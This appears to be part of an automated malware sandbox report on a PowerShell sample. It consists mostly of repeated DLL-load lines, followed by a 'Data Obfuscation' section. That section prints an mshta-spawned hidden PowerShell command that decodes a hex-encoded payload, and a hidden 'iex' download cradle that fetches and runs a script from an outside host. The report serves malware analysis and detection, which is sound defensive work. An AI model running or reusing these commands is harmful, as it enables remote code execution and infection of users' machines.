                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

                Data Obfuscation

                barindex
                Found suspicious powershell code related to unpacking or dynamic code loading
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$bytESTRInG = $ENC.$KFPPygMgLP1k8Q6dlweOupSSqCpkfoFRvU3qNhJ7UoZFcxhvUk6qVW3HARbKd0e3nWLlF3PmHTuWwjuB6i3MOMaxawv6WeSVm1ZTT9Ruabbj2NRbSFAaOQU699DWtX0FJupzRu6JgcZNJztD9XSm3blDcSPYvu
                Suspicious powershell command line found
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function cDnCn($pBla){return -split ($pBla -replace '..', '0x$& ')};$Lhmk = cDnCn('A3AA4480FF655084E70ADC84D9EA6341178CCA80AF8469B12931F471AF827F36734F649E4FFC481465F7A8A2BFA75783C467F30497BC4B11E481C2530797B14FC2F5B368B22016A880E652482E6475CF0DC1A66EA8F0136B2BBC629A30CEB860956FD49362AEC1529369252FC290E7464876570EB817D8E9B180D541376938391A342371D8EEE7C40B429917ED3BAE7546609A8390B670A9097CB2F4371F68C266424FC610C85C530E515400B772D500AE542F889F9A970F0C0884F9DAB2F28BCD379149C803B7F17EEC6C69E622BA1F8B13247111CF1CCB79B4798B7DFB6AEC68A8F963D9FE6AC1AF1987A9FB2A16B0F82B9BA594307ADEEA757F6284F08DDB1A3BFA98B3BEA493C2C605A6EBF27BFDF963BEF1C0F74C61BB82B80E6A9B2F61E44AC18908A15AC5CA52E0D0B5E7ECA5C629F9CE088140C02670105B1C1EB4C39C449DED3A8E098E14832E1159B7BFE7F74012F5AB28A812BD11B0830216EC8E5F537AD27755CAD7EFBDAEB4C5E6235233729039ACA656A57FB2D8AFEF2960E070779A4CF1BD35291B7033D4618B7FBEC36B04BDD9CC6D825285FE8E9B14F783B7F3071ABE49F6BE8DFE02D7E8B0A4E5FEAD8570B4049362BC3FF9599BEF08430DEA16A596C8E8AA8FEBE25A7D3AEF1A0F1D2A47644C59B18A95C4E955B6A747C547978A1471BD6004B1ECD6443ABC8058ED921C2A97C1449AE376C36FB9DA81ED841F3F4437F69417CEF04ACD68C114464AA5755262E3E2A8804F5D1F018C94308E1802E6C59864386DF18AC9D197902C482A57D3531FCB49886B15046AF78768F80014DE486E0E78D49561586C41C0E653A2A6BB84F1D7467BB73BF1E6FF73E92540FCC809AA398E26B9A708706094D4A5382850472779AD17B69C066B29CAAE8B04F605E50CC29E8480DD31E8DB08E7717139D5A19EE210804AD16CA1445A2EAC4D7C66209914C86431F3B5174ECE947BEBD88F70D5299D63C267D52D0EA77D645EBCDD39A110138C082CD3C09CA8AA75E9A53A689D0576C332EE23948AE9ECCCE522DACC38B3581F9C71CFC27C56F81F9CB5C9D938E2A35C15A5E7CE4C1DB70B003BF969AB7131336F933529CEA80A9FACB8C911FDA0C526986D4E8FB5FDDDA4C0DF5762BE3783933E8E0AB3D712CD3B563309BDB03A5460E12D1C34126A4F89191E1C34197F7EB35212BAA7E9D32890ED00618DFED16C97F2F709899CAEA84C4AA2A7B5371A5FACA3D115E12BE56D873196999184299302AD235C87C226989D2CBEBA4D82E6C270F060D4165DE6962A5077677A4796A0FC82E05AAB1272F50397568327381A2D529A9466317AB38D192E338BDA14927384DF7CCBAFF9E8594748246285B3D8AA54C12D8C53351947654EA52F7B1A29724A48C14A1D4FCAD70EDC954B5D82A932AC8FF8A2DCB79D1C10C7458B14A40215396E306C046B7DD83B83B6EB6FFAE26FF38DE7E40F09DE9FDD00EC21F89B23814EBBD7E5B2A5AA1A2C0CC6814E4C15D127261B29720A28F854382CC18092685037C23B14ED11E90915036D385992F5D948F9775BB8B9C159C5C39C63E68221BF35A5518331151C4C0BACB7B58F5A8B9DF32BD1C3C4828D65896C8DC07B8002C812E8FED5F8FE86A6138586B9DC1F40F9A4E967D8E87CD674633563F6514E3557D8EFDE3A0247843CCA695357E876D6F77804DCB5599681DA62FAED5D52BA3AB823A2D2219C0783C18FBD3FC8897A07B5FEA483FF46AF5F23EB91E20E31A520B6566B846C91212DECBB9F2E6972ADCAB84A64D2DC6EBFA7B5758A915C3A978589C931CEFE5B8868B0256407FA6B78E518E0B7D7A8042BD51A46F9297518C6F4EB262D6525B016FB7D858136FCBF7AF2BC0D0488BEFD0CED9A5213FF3FF1B7B481CB6454CC9C929EDF1779EEFB9842B90ED62994AE6BD859C94C0821F219C5A77E00C97981C5B1F965E0977F82C3EC531C34Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://journal.liveview.pw/singl6.vsdx'))" Jump to behavior
